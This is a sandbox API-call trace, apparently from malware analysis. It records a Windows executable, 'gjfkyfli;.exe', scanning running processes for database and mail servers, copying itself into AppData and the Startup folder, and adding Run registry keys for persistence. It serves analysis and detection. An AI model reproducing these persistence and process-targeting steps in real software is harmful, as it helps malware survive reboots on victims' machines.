	[0136.677] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0136.677] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0136.677] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.677] lstrlenW (lpString="svchost.exe") returned 11
	[0136.677] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.677] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.677] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.678] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.678] lstrlenW (lpString="svchost.exe") returned 11
	[0136.678] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.678] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.678] lstrlenW (lpString="svchost.exe") returned 11
	[0136.678] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.678] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.680] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.680] lstrlenW (lpString="svchost.exe") returned 11
	[0136.680] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0136.680] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0136.680] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.681] lstrlenW (lpString="svchost.exe") returned 11
	[0136.681] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0136.681] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0136.681] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0136.681] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0136.681] lstrlenW (lpString="audiodg.exe") returned 11
	[0136.681] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.681] lstrlenW (lpString="svchost.exe") returned 11
	[0136.681] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.682] lstrlenW (lpString="svchost.exe") returned 11
	[0136.682] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0136.682] lstrlenW (lpString="spoolsv.exe") returned 11
	[0136.682] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0136.682] lstrlenW (lpString="svchost.exe") returned 11
	[0136.682] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0136.683] lstrlenW (lpString="taskhost.exe") returned 12
	[0136.683] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0136.683] lstrlenW (lpString="userinit.exe") returned 12
	[0136.683] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0136.683] lstrlenW (lpString="dwm.exe") returned 7
	[0136.683] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0136.683] lstrlenW (lpString="explorer.exe") returned 12
	[0136.684] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0136.684] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0136.684] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0136.684] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0136.684] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0136.684] lstrlenW (lpString="dllhost.exe") returned 11
	[0136.684] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0136.685] lstrlenW (lpString="reader_sl.exe") returned 13
	[0136.685] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0136.685] CloseHandle (hObject=0xe4) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b20180 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b201c8 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b41a18 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b41a38 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b41a80 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b41280 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1f680 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1f6b8 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd48 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1f700 | out: hHeap=0x7ab0000) returned 1
	[0136.685] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd70 | out: hHeap=0x7ab0000) returned 1
	[0136.685] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b46528
	[0136.686] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b56530
	[0136.686] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.686] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd70
	[0136.686] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd70, Size=0x40) returned 0x7b201c8
	[0136.686] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.686] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd70
	[0136.686] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.686] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd48
	[0136.686] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.686] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd20
	[0136.686] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b20180
	[0136.686] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b56530, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe")) returned 0x69
	[0136.686] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b66538
	[0136.687] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b76540
	[0136.687] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.687] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd20
	[0136.687] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b202e8
	[0136.687] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b202e8, Size=0x80) returned 0x7b419d0
	[0136.687] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b419d0, Size=0x100) returned 0x7b429f8
	[0136.687] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.687] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b429f8 | out: hHeap=0x7ab0000) returned 1
	[0136.687] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\gjfkyfli;.exe", lpDst=0x7b66538, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\gjfkyfli;.exe") returned 0x22
	[0136.687] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b76540 | out: hHeap=0x7ab0000) returned 1
	[0136.687] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b66538 | out: hHeap=0x7ab0000) returned 1
	[0136.687] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0x95d0020
	[0136.688] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.688] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd20
	[0136.688] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.688] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b200b8
	[0136.688] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.688] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.688] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x0) returned 1
	[0136.688] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.688] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.688] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.688] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4
	[0136.688] CreateFileW (lpFileName="C:\\Windows\\System32\\gjfkyfli;.exe" (normalized: "c:\\windows\\system32\\gjfkyfli;.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0136.697] CloseHandle (hObject=0xe4) returned 1
	[0136.697] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.697] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b200b8
	[0136.697] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.697] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd20
	[0136.697] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.698] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.698] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0136.698] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.698] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.698] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.698] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.698] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x95d0020 | out: hHeap=0x7ab0000) returned 1
	[0136.698] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b66538
	[0136.698] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b76540
	[0136.698] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.698] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b200b8
	[0136.698] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b200b8, Size=0x40) returned 0x7b202e8
	[0136.698] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b202e8, Size=0x80) returned 0x7b419d0
	[0136.698] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b419d0, Size=0x100) returned 0x7b429f8
	[0136.698] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.698] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b429f8 | out: hHeap=0x7ab0000) returned 1
	[0136.698] ExpandEnvironmentStringsW (in: lpSrc="%appdata%\\gjfkyfli;.exe", lpDst=0x7b66538, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gjfkyfli;.exe") returned 0x3c
	[0136.698] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b76540 | out: hHeap=0x7ab0000) returned 1
	[0136.698] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b66538 | out: hHeap=0x7ab0000) returned 1
	[0136.698] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0x95d0020
	[0136.699] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.699] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b200b8
	[0136.699] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.699] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd20
	[0136.699] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.699] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.699] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0136.699] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.699] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.699] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.699] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4
	[0136.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gjfkyfli;.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8
	[0136.700] ReadFile (in: hFile=0xe4, lpBuffer=0x95d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x95d0020*, lpNumberOfBytesRead=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0136.716] WriteFile (in: hFile=0xe8, lpBuffer=0x95d0020*, nNumberOfBytesToWrite=0x3e600, lpNumberOfBytesWritten=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x95d0020*, lpNumberOfBytesWritten=0x18f958*=0x3e600, lpOverlapped=0x0) returned 1
	[0136.720] ReadFile (in: hFile=0xe4, lpBuffer=0x95d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18f958, lpOverlapped=0x0 | out: lpBuffer=0x95d0020*, lpNumberOfBytesRead=0x18f958*=0x0, lpOverlapped=0x0) returned 1
	[0136.720] CloseHandle (hObject=0xe8) returned 1
	[0136.721] CloseHandle (hObject=0xe4) returned 1
	[0136.721] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.721] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd20
	[0136.721] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.721] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b200b8
	[0136.721] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0136.721] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0136.721] Wow64DisableWow64FsRedirection (in: OldValue=0x18f95c | out: OldValue=0x18f95c*=0x1) returned 1
	[0136.721] lstrlenW (lpString="kernel32.dll") returned 12
	[0136.721] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.721] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0136.721] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.721] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x95d0020 | out: hHeap=0x7ab0000) returned 1
	[0136.726] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.726] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41280, Size=0x20) returned 0x7b1fd20
	[0136.726] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b202e8
	[0136.726] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b202e8, Size=0x80) returned 0x7b419d0
	[0136.726] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gjfkyfli;.exe") returned 59
	[0136.726] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45
	[0136.726] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x5c) returned 0x7b429f8
	[0136.726] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18f92c | out: phkResult=0x18f92c*=0xe4) returned 0x0
	[0136.726] RegSetValueExW (hKey=0xe4, lpValueName="gjfkyfli;.exe", Reserved=0x0, dwType=0x1, lpData=0x7b46528, cbData=0x76) returned 0x5
	[0136.726] RegCloseKey (hKey=0xe4) returned 0x0
	[0136.726] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b429f8 | out: hHeap=0x7ab0000) returned 1
	[0136.726] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gjfkyfli;.exe") returned 59
	[0136.726] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45
	[0136.726] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x5c) returned 0x7b429f8
	[0136.727] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18f92c | out: phkResult=0x18f92c*=0xe8) returned 0x0
	[0136.727] RegSetValueExW (in: hKey=0xe8, lpValueName="gjfkyfli;.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gjfkyfli;.exe", cbData=0x76 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gjfkyfli;.exe") returned 0x0
	[0136.727] RegCloseKey (hKey=0xe8) returned 0x0
	[0136.727] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b429f8 | out: hHeap=0x7ab0000) returned 1
	[0136.727] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45
	[0136.727] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b419d0 | out: hHeap=0x7ab0000) returned 1
